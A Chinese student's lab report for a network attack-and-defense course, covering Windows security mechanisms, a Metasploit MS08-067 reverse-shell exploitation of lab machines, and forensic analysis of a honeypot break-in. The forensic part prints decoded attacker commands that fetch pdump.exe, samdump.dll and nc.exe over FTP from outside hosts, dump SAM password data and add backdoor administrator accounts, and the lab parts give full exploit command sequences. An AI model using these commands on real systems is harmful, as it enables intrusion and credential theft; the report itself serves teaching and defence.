20212928 2021-2022-2 《网络攻防实践》第8周作业
1.实践基础知识
1)windows操作系统的基本结构
-
windows操作系统内核的基本模块
windows执行体、windows内核体、设备驱动程序、硬件抽象层
windows窗口与图形界面接口内核实现代码
系统支持进程、环境子系统服务进程
服务进程、用户应用软件
核心子系统dll -
windows操作系统内核中实现的核心机制
windows进程和线程管理机制
windows内存管理机制
windows文件管理机制
windows注册表管理机制
windows的网络机制
2)windows操作系统的安全系统
- windows操作系统基于引用监控器模型
- windows身份认证机制
windows操作系统以安全主体概念包含访问的请求实体对象、用户、用户组和计算机三大类
- 自主访问控制与强制访问控制机制
访问控制是操作系统安全的核心内容和基本要求。当系统主体对客体进行访问时,应按照一定的机制判定访问请求和访问方式是否合法,
进而决定是否支持访问请求和执行访问操作。通常包括自主访问控制和强制访问控制等两种方式,前者指主体(进程或用户)对客体(如文件、目录、特殊设备文件等)
的访问权限只能由客体的属主或超级用户决定或更改;而后者则由专门的安全管理员按照一定的规则分别对系统中的主体和客体赋予相应的安全标记,且基于特定的强制访问规则来决定是否允许访问。 - windows安全审计机制
安全审计是一种事后追查的安全机制,其主要目标是检测和判定非法用户对系统的渗透或入侵,识别误操作并记录进程基于特定安全级活动的详细情况。通常,安全审计机制应提供审计事件配置、审计记录分类及排序等附带功能。 - Windows系统实现安全机制的基本手段
标识、鉴别及可信通路机制
用于保证只有合法用户才能以系统允许的方式存取系统中的资源。用户合法性检查和身份认证机制通常采用口令验证或物理鉴定(如磁卡或IC卡、数字签名、指纹识别、声音识别)的方式。而就口令验证来讲,
系统必须采用将用户输入的口令和保存在系统中的口令相比较的方式,因此系统口令表应基于特定加密手段及存取控制机制来保证其保密性。此外,还必须保证用户与系统间交互特别是登陆过程的安全性和可信性。
最小特权管理机制
特权是超越访问控制限制的能力,它和访问控制结合使用,提高了系统的灵活性。然而,简单的系统管理员或超级用户管理模式也带来了不安全的隐患,即一旦相应口令失窃,则后果不堪设想。因此,应引入最
小特权管理机制,根据敏感操作类型进行特权细分及基于职责关联一组特权指令集,同时建立特权传递及计算机制,并保证任何企图超越强制访问控制和自主访问控制的特权任务,都必须通过特权机制的检查。
隐蔽通道分析处理机制
所谓隐蔽通道是指允许进程间以危害系统安全策略的方式传输信息的通信信道。根据共享资源性质的不同,其具体可分为存储隐蔽通道和时间隐蔽通道。鉴于隐蔽通道可能造成严重的信息泄漏,所以应当建
立适当的隐蔽通道分析处理机制,以监测和识别可能的隐蔽通道,并予以消除、降低带宽或进行审计。
3)windows远程安全攻防技术
远程口令猜测与破解攻击:采用暴力破解、基于字典的猜测以及中间人身份认证欺骗攻击技术
攻击windows网络服务:系统存在可能导致远程代码执行的高危性安全漏洞,攻击者也一直在利用这些漏洞对windows网络服务实施远程渗透攻击,从而得到系统的访问权
攻击windows客户端及用户:攻击者利用社会工程学诱骗用户来帮助他们执行伪装目的的恶意代码或者流氓软件。
针对特定目标的渗透测试攻击工程流程
漏洞扫描测试、查找针对发现漏洞的渗透代码、实施渗透测试
使用metasploit软件实施渗透测试。
windows口令猜测与破解攻击
猜测:最简单的猜测攻击就是在命令行终端中输入“net use \HOST\IPC$*/u:Administrator”根据提示猜测账号的收集。
常用工具:legion、enum、smbgrind、ntscan
远程口令字交换通信窃听与破解
windows在进行网络身份认证时,使用LanMan、NTLM和Kerberos认证协议。
windows远程渗透攻击
a.针对于NetBIOS的攻击
NetBIOS以运行在TCP/IP系统中的NBT协议来实现,具体包括在UDP的137端口上监听的NetBIOS名字的服务;UDP的138端口上的NetBIOS数据报服务;TCP的139,445端口的NetBIOS会话服务。
b.SMB网络服务
SMB(Server Message Block)提供了Windows网络中最常用的远程文件与打印共享服务,其次SMB的命名管道是MSRPC协议认证和调用本地服务的承载传输层,139和445端口。
c.MSRPC网络服务
这个服务能够完美的调用远程服务器上服务进程的过程。采用的网络传输层协议包括:
ncacn_ip_tcp 135
ncadg_ip_udp 135
ncacn_np (TCP 139和445)主要是这个,SMB命名管道传输协议
d.RDP远程桌面服务
默认3389端口,MS12-020漏洞使得目标机器rdpwd.sys内存崩溃,拒绝服务。
针对于windows系统上微软网络服务的渗透攻击
比如微软产品IIS,SQL,Exchange,DNS,WINS,FTP等
针对于windows系统上第三方网络服务渗透攻击
windows上的Apache,serv-u,websphere,Filezilla等程序漏洞攻击
针对网络服务远程渗透攻击的安全防范措施
1、禁用所有不必要的网络服务
2、尽量选择更安全的网络协议与服务软件,并使用最佳安全实践进行部署(在这些协议中,FTP的安全性最为薄弱,应该尽量避免使用,
而SSH/SFTP除了对身份认证过程中的敏感登陆信息进行加密传输之外,对所有通过网络传输的文件内容也进行了加密,因此安全性是最高的。
在选定网络协议与具体的网络服务软件之后,网络管理员下一步要做的是根据一份最佳安全配置实践指导来架设网络服务,其中需要特别重视
的是一定要修改网络服务的默认口令和一些不安全配置)
3、及时更新网络服务版本(网络管理员是否能够及时地更新网络服务软件,是决定服务器系统安全性的关键所在)
4、使用xinetd、防火墙为Linux网络服务添加网络访问控制机制(xinetd是由inetd和TCP Wrapper发展而来的一套网络访问控制机制,
提供了Linux系统中启动一些控制网络服务,并增强其安全性的一套解决方案)
5、建立入侵检测与应急响应计划流程(在网关位置部署Snort NIDS并进行正确有效的配置,此外也可以选择在关键的服务器系统上安装
OSSEC等HIDS系统,监控系统上的入侵行为,还需要建立起一套完整的应急响应计划体系)。
2.实践过程
(1)动手实践Metasploit windows attacker
- 任务:使用metasploit软件进行windows远程渗透统计实验
- 具体任务内容:使用windows Attacker/BT4攻击机尝试对windows Metasploitable靶机上的MS08-067漏洞进行远程渗透攻击,获取目标主机的访问权
实验环境如下:
| 名称 | IP |
|---|---|
| Kali | 192.168.200.4 |
| Win2kServer | 192.168.200.124 |
1)首先,打开Kali,在攻击机kali中输入命令msfconsole进入Metasploit,如下图:
2)进入后,使用命令search ms08-067查看该漏洞的详细情况,在exploit库中可找到针对该漏洞的渗透攻击模块,如下图:
3)使用命令use exploit/windows/smb/ms08_067_netapi使用该攻击模块,并使用命令show payloads列举出所有适用的负载模块,查看有效的攻击载荷,如下图所示:
4)选择payload3,进行反向连接。输入命令set payload 3设置攻击的载荷为tcp的反向连接,配置该渗透攻击模块和攻击负载模块所必须的参数,输入指令
set lhost 192.168.200.2 设置其为攻击机kali地址, 输入指令set rhost 192.168.200.124 将其设为靶机地址,使用指令show options 查看当前参数列表及其默认装置
5)之后,输入run指令,出现系列的信息,如下图
发现并不能攻击成功,
打开Honey后重试,如下图
界面显示如上图,出现'C:WINNTsystem32:',说明攻击机已经成功进入靶机系统,输入ipconfig指令验证一下,如下图:
执行成功。说明攻击成功。
6)同时,在Kali攻击机中输入指令cd\,输入md panchenglei,尝试在靶机的C盘上新建一个名为panchenglei的文件夹,如下图
在靶机上进行查看,发现C盘确实有一个名为panchenglei的文件夹
(2)取证分析实践:解码一次成功的NT系统破解攻击
- 来自212.116.251.162的攻击者成功攻陷了一台由rfp部署的蜜罐主机172.16.1.106,(主机名为lab.wiretrip.net),要求提取并分析攻击的全部过程。
- 攻击者使用了什么破解工具进行攻击攻击者如何使用这个破解工具进入并控制了系统
- 攻击者获得系统访问权限后做了什么
- 我们如何防止这样的攻击
- 你觉得攻击者是否警觉了他的目标是一台蜜罐主机?如果是,为什么
1)首先,用wireshark打开课前从云班课上拷的snort-0204@0117.log该二进制文件,如下图
输入指令ip.addr == 172.16.1.106 and http 过滤掉其他无关数据包。
跟踪一个数据包的TCP流,如下图
从下图可以看到C0%AF%的特殊字符,因此可以确定存在UNIcode中存在解码错误漏洞,存在Unicode漏洞攻击,
2)继续跟踪数据流,如下图,可以看到msadcs.dll,发现有一句与shell有关的语句,因此判断为一个rds漏洞,
3)接下来,我们整理Shell代码并进行简要的分析可得:
s.h.e.l.l.(.".c.m.d. ./.c. .e.c.h.o. .w.e.r.d. .>.>. .c.:..f.u.n.".)
s.h.e.l.l.(.".c.m.d. ./.c. .e.c.h.o. .u.s.e.r. .j.o.h.n.a.2.k. .>. .f.t.p.c.o.m.".)
s.h.e.l.l.(.".c.m.d. ./.c. .e.c.h.o. .h.a.c.k.e.r.2.0.0.0. .>.>. .f.t.p.c.o.m.".)
s.h.e.l.l.(.".c.m.d. ./.c. .e.c.h.o. .g.e.t. .s.a.m.d.u.m.p...d.l.l. .>.>. .f.t.p.c.o.m.".)
s.h.e.l.l.(.".c.m.d. ./.c. .e.c.h.o. .g.e.t. .p.d.u.m.p...e.x.e. .>.>. .f.t.p.c.o.m.".)
s.h.e.l.l.(.".c.m.d. ./.c. .e.c.h.o. .g.e.t. .n.c...e.x.e. .>.>. .f.t.p.c.o.m.".)
s.h.e.l.l.(.".c.m.d. ./.c. .e.c.h.o. .q.u.i.t. .>.>. .f.t.p.c.o.m.".)
s.h.e.l.l.(.".c.m.d. ./.c. .f.t.p. .-.s.:.f.t.p.c.o.m. .-.n. .w.w.w...n.e.t.h.e.r...n.e.t.".)
s.h.e.l.l.(.".c.m.d. ./.c. .p.d.u.m.p...e.x.e. .>.>. .n.e.w...p.a.s.s.".)
s.h.e.l.l.(.".c.m.d. ./.c. .e.c.h.o. .u.s.e.r. .j.o.h.n.a.2.k. .>. .f.t.p.c.o.m.2.".)
s.h.e.l.l.(.".c.m.d. ./.c. .e.c.h.o. .h.a.c.k.e.r.2.0.0.0. .>.>. .f.t.p.c.o.m.2.".)
s.h.e.l.l.(.".c.m.d. ./.c. .p.u.t. .n.e.w...p.a.s.s. .>.>. .f.t.p.c.o.m.2.".)
s.h.e.l.l.(.".c.m.d. ./.c. .e.c.h.o. .q.u.i.t. .>.>. .f.t.p.c.o.m.2.".)
s.h.e.l.l.(.".c.m.d. ./.c. .f.t.p. .-.s.:.f.t.p.c.o.m.2. .-.n. .w.w.w...n.e.t.h.e.r...n.e.t.".)
s.h.e.l.l.(.".c.m.d. ./.c. .f.t.p. .2.1.3...1.1.6...2.5.1...1.6.2.".)
s.h.e.l.l.(.".c.m.d. ./.c. .e.c.h.o. .o.p.e.n. .2.1.3...1.1.6...2.5.1...1.6.2. .>. .f.t.p.c.o.m.".)
s.h.e.l.l.(.".c.m.d. ./.c. .e.c.h.o. .j.o.h.n.a.2.k. .>. .f.t.p.c.o.m.".)
s.h.e.l.l.(.".c.m.d. ./.c. .e.c.h.o. .h.a.c.k.e.r.2.0.0.0. .>.>. .f.t.p.c.o.m.".)
s.h.e.l.l.(.".c.m.d. ./.c. .e.c.h.o. .g.e.t. .s.a.m.d.u.m.p...d.l.l. .>.>. .f.t.p.c.o.m.".)
s.h.e.l.l.(.".c.m.d. ./.c. .e.c.h.o. .g.e.t. .p.d.u.m.p...e.x.e. .>.>. .f.t.p.c.o.m.".)
s.h.e.l.l.(.".c.m.d. ./.c. .e.c.h.o. .g.e.t. .n.c...e.x.e. .>.>. .f.t.p.c.o.m.".)
s.h.e.l.l.(.".c.m.d. ./.c. .f.t.p. .-.s.:.f.t.p.c.o.m.".)
第一、二段中使用ftpcom可知攻击机打开IP213.116.251.162,使用ftp的方式下载文件,
pdump.exe和samdump.dll是配合使用破解口令的,samdump.dll拿到口令pdump.exe破解,
SAM文件通过安全表示进行账号安全管理文件。PS:本地特权提升采用dll注入或破解程序漏洞得到。
之后我们在继续整理Shell代码,如下
s.h.e.l.l.(.".c.m.d. ./.c. .o.p.e.n. .2.1.2...1.3.9...1.2...2.6.".)
s.h.e.l.l.(.".c.m.d. ./.c. .e.c.h.o. .j.o.h.n.a.2.k. .>.>.s.a.s.f.i.l.e.".)
s.h.e.l.l.(.".c.m.d. ./.c. .e.c.h.o. .h.a.x.e.d.j.0.0. .>.>.s.a.s.f.i.l.e.".)
s.h.e.l.l.(.".c.m.d. ./.c. .e.c.h.o. .g.e.t. .p.d.u.m.p...e.x.e. .>.>.s.a.s.f.i.l.e.".)
s.h.e.l.l.(.".c.m.d. ./.c. .e.c.h.o. .g.e.t. .s.a.m.d.u.m.p...d.l.l. .>.>.s.a.s.f.i.l.e.".)
s.h.e.l.l.(.".c.m.d. ./.c. .e.c.h.o. .g.e.t. .n.c...e.x.e. .>.>.s.a.s.f.i.l.e.".)
s.h.e.l.l.(.".c.m.d. ./.c. .e.c.h.o. .q.u.i.t. .>.>.s.a.s.f.i.l.e.".)
s.h.e.l.l.(.".c.m.d. ./.c. .f.t.p. .-.s.:.s.a.s.f.i.l.e.".)
s.h.e.l.l.(.".c.m.d. ./.c. .o.p.e.n. .2.1.3...1.1.6...2.5.1...1.6.2.".)
s.h.e.l.l.(.".c.m.d. ./.c. .e.c.h.o. .j.o.h.n.a.2.k. .>.>.s.a.s.f.i.l.e.".)
s.h.e.l.l.(.".c.m.d. ./.c. .e.c.h.o. .h.a.x.e.d.j.0.0. .>.>.s.a.s.f.i.l.e.".)
s.h.e.l.l.(.".c.m.d. ./.c. .e.c.h.o. .g.e.t. .p.d.u.m.p...e.x.e. .>.>.s.a.s.f.i.l.e.".)
s.h.e.l.l.(.".c.m.d. ./.c. .e.c.h.o. .g.e.t. .s.a.m.d.u.m.p...d.l.l. .>.>.s.a.s.f.i.l.e.".)
s.h.e.l.l.(.".c.m.d. ./.c. .e.c.h.o. .g.e.t. .n.c...e.x.e. .>.>.s.a.s.f.i.l.e.".)
s.h.e.l.l.(.".c.m.d. ./.c. .e.c.h.o. .q.u.i.t. .>.>.s.a.s.f.i.l.e.".)
由上可以看到,第二段和第三段的sasfile为高效读入数据方式,因此为IP分别为212.139.12.26和213.116.251.162写入了文件,
,需要注意的时ne.exe是远程入侵后门程序,便于进行下一次的攻击。
之后,我再继续分析msadcs.dll的shell代码,并进行如下整理:
s.h.e.l.l.(.".c.m.d. ./.c. .f.t.p. .-.s.:.s.a.s.f.i.l.e.".)
s.h.e.l.l.(.".c.m.d. ./.c. .C.:..P.r.o.g.r.a.m. .F.i.l.e.s..C.o.m.m.o.n. .F.i.l.e.s..s.y.s.t.e.m..m.s.a.d.c..p.d.u.m.p...e.x.e. .>.>.y.a.y...t.x.t.".)
s.h.e.l.l.(.".c.m.d. ./.c. .C.:..P.r.o.g.r.a.m. .F.i.l.e.s..C.o.m.m.o.n. .F.i.l.e.s..s.y.s.t.e.m..m.s.a.d.c..p.d.u.m.p...e.x.e. .>.>. .c.:..y.a.y...t.x.t.".)
创建会话写入文件yay.txt
s.h.e.l.l.(.".c.m.d. ./.c. .p.d.u.m.p...e.x.e. .>.>. .c.:..y.a.y...t.x.t.".)
s.h.e.l.l.(.".c.m.d. ./.c. .n.e.t. .s.e.s.s.i.o.n. .>.>.y.a.y.2...t.x.t.".)
s.h.e.l.l.(.".c.m.d. ./.c. .n.e.t. .s.e.s.s.i.o.n. .>.>.c.:..y.a.y.2...t.x.t.".)
s.h.e.l.l.(.".c.m.d. ./.c. .n.e.t. .u.s.e.r.s. .>.>.h.e.h...t.x.t.".)
s.h.e.l.l.(.".c.m.d. ./.c. .n.e.t. .u.s.e.r.s. .>.>.c.:..h.e.h...t.x.t.".)
创建用户组提升自己的访问权限
s.h.e.l.l.(.".c.m.d. ./.c. .n.e.t. .l.o.c.a.l.g.r.o.u.p. .D.o.m.a.i.n. .A.d.m.i.n.s. .I.W.A.M._.K.E.N.N.Y. ./.A.D.D.".)
s.h.e.l.l.(.".c.m.d. ./.c. .n.e.t. .l.o.c.a.l.g.r.o.u.p. .D.o.m.a.i.n. .A.d.m.i.n.s. .I.U.S.R._.K.E.N.N.Y. ./.A.D.D.".)
s.h.e.l.l.(.".c.m.d. ./.c. .n.e.t. .l.o.c.a.l.g.r.o.u.p. .a.d.m.i.n.i.s.t.r.a.t.o.r.s. .I.U.S.R._.K.E.N.N.Y. ./.A.D.D.".)
s.h.e.l.l.(.".c.m.d. ./.c. .n.e.t. **.l.o.c.a.l.g.r.o.u.p. **.a.d.m.i.n.i.s.t.r.a.t.o.r.s. .I.W.A.M._.K.E.N.N.Y. ./.A.D.D.".)
s.h.e.l.l.(.".c.m.d. ./.c. .n.e.t. .u.s.e.r. .t.e.s.t.u.s.e.r. .U.g.o.t.H.a.c.k.e.d. ./.A.D.D.".)
s.h.e.l.l.(.".c.m.d. ./.c. .n.e.t. .l.o.c.a.l.g.r.o.u.p. .A.d.m.i.n.i.s.t.r.a.t.o.r.s. .t.e.s.t.u.s.e.r. ./.A.D.D.".)
从上述整理的shell代码可以看出,攻击机进入靶机之后查看了一些系统文件,注意关键字ProgramFiles;然后创建会话写入文件yay.txt,
我们可以注意到前面的pdump.exe,这是上一步中提到的口令破解文件,所以猜测创建的会话将破解的口令写入文件yay.txt。
之后,我再继续分析msadcs.dll的shell代码,并进行如下整理:
利用磁盘修复工具包中的rdisk创建SAM文件副本
s.h.e.l.l.(.".c.m.d. ./.c. .r.d.i.s.k. .-./.s.".)
s.h.e.l.l.(.".c.m.d. ./.c. .r.d.i.s.k. .-.s.".)
s.h.e.l.l.(.".c.m.d. ./.c. .r.d.i.s.k.".)
s.h.e.l.l.(.".c.m.d. ./.c. .r.d.i.s.k. .-.s./.".)
s.h.e.l.l.(.".c.m.d. ./.c. .r.d.i.s.k. .-.s./.".)
s.h.e.l.l.(.".c.m.d. ./.c. .r.d.i.s.k. ./.s.-.".)
s.h.e.l.l.(.".c.m.d. ./.c. .r.d.i.s.k. ./.s.-.".)
s.h.e.l.l.(.".c.m.d. ./.c. .r.d.i.s.k. ./.s.-.".)
删除和拷贝SAM中数据(删除和拷贝har.txt)
s.h.e.l.l.(.".c.m.d. ./.c. .t.y.p.e. .c.:..w.i.n.n.t..r.e.p.a.i.r..s.a.m..._. .>.>.c.:..h.a.r...t.x.t.".)
s.h.e.l.l.(.".c.m.d. ./.c. .d.e.l. .c.:..i.n.e.t.p.u.b..w.w.w.r.o.o.t..h.a.r...t.x.t.".)
s.h.e.l.l.(.".c.m.d. ./.c. .d.e.l. .c.:..i.n.e.t.p.u.b..w.w.w.r.o.o.t..h.a.r...t.x.t.".)
s.h.e.l.l.(.".c.m.d. ./.c. .n.e.t. .u.s.e.r. .I.W.A.M._.K.E.N.N.Y. .S.n.a.k.e.6.9.S.n.a.k.e.6.9.".)
之后,要创建用户组等提升攻击机的访问权限,然后利用磁盛修复工具包中的rdisk工具创建SAM文件副本(SAM文件中是安全账号管理)
可以发现创建的口令来来回回执行了好几次,猜测这个攻击者这步操作应该不是很顺利吧!毕竟是SAM文件,然后尝试删除和拷贝SAM文件中的数据即删除和拷贝har.txt文件;
4)查看NO.1233的tcp流发现端口6969是木马Gatecrasher、Priority开放的端口,如下图所示:
在查看5766的TCP流如下,删除了http文件,所以猜测可能删除了rfp.txt文件。
由以上步骤我们来解决以下问题:
问题1,攻击者使用说明工具攻击。
上述指令采用了Microsoft Access Driver的驱动,攻击者使用了rain forest puppy写的msadc.dll代码进行的攻击。
问题2,攻击机如何进入并控制系统。
攻击机写了个脚本msadc.dll,打开主机后通过FTP 213.116.251.162传输了一个samdump.dll和pdump.exe,通过密码破解成功拿到权限。
问题3:获得权限后做了什么。
获取了I.W.A.M._.K.E.N.N.Y账号并为本地.A.d.m.i.n.i.s.t.r.a.t.o.r.s.账户提权,将破解的口令写入了yay.txt文件中,删除har.txt文件。
问题4如何防止。
1.要及时升级系统,修复相关漏洞。
2.安装windows NT系统时不要使用默认WINNT路径
3.开启系统或软件自带的防火墙。
4.使用 IIS Lockdown 和 URLScan 等工具加强 web serve
问题5:你觉得攻击者是否察觉是一台蜜罐。
攻击者察觉了是一台蜜罐,从下图的TCP流中可以看出攻击者发现是台蜜罐就删文件跑路了
(3)团队对抗实践:windows系统远程渗透攻击和分析。
-
攻方使用metasploit选择漏洞进行攻击,获得控制权。(要求写出攻击方的同学信息、使用漏洞、相关IP地址等)
-
防守方使用wireshark监听获得的网络数据包,分析攻击过程,获取相关信息。
作为攻击方
我们打开Kali进入到软件,metasploit framework,输入以下命令得到如下截图
但是发现攻击不成功。接下来调整思路在进攻
1)查看是否能ping通对方,对方的IP是192.168.1.114
2)发现可ping成功,输入命令nmap --script=vuln -Pn 192.168.1.111查看对方是否存在漏洞,可以发现存在ms08-067.
3)输入命令search ms08-067查看此漏洞
4)输入命令行use windows/smb/ms08_067_netapi进入漏洞所在文件,输入命令行show options查看攻击此漏洞需要的设置,如下图:
继续输入命令行set payload generic/shell_reverse_tcp设置载荷,输入命令行set RHOSTS 192.168.1.114设置要攻击主机,输入命令行set LHOST 192.168.1.120设置本机.
5)输入run进行攻击,可以看到侵入对方,输入md 20212928pcl、md panchenglei,在对方的C:\WINNT\system32目录中建立文件夹,以表示进行控制对方电脑。
6)之后,让被攻击的同学截图发给我,可看到确实由两个新建文件夹,截图如下,说明此次攻击成功。
作为防守方
1)打开wireshark进行抓包,做为被攻击者接受攻击
2)从被攻击同学那进行抓包分析
分析抓包到的数据,可以看到源地址为192.168.1.120,目的地址为192.168.1.114
选择此数据并追踪其tcp数据流,可以查看到攻击者对电脑进行的了操作如下,即建立了一个20212928 pcl的文件夹
3.学习中遇到的问题及解决
问题1:在做实验(二)时,VM的窗口突然变小了,百度各种方法各种查都不行,花了好长时间。
解决1.:最后,重启了一下,发现可以按照设置的大小进行变大处理。
问题2:在做实验(三)时,由于刚开始命令输入的不对,有跳步骤,所以攻击不成功,一直显示没有建立会话,有如下截图
解决2:按视频步骤一步步来,可以攻击成功。
4.学习感想和体会
本次实验虽然在做的过程中由于各种问题导致我花费了大量的时间,但自己也通过亲手做攻防,并从出现问题到解决问题中
体会到了学习的乐趣,学会了使用msf软件渗透主机,了解了这个工具的使用。
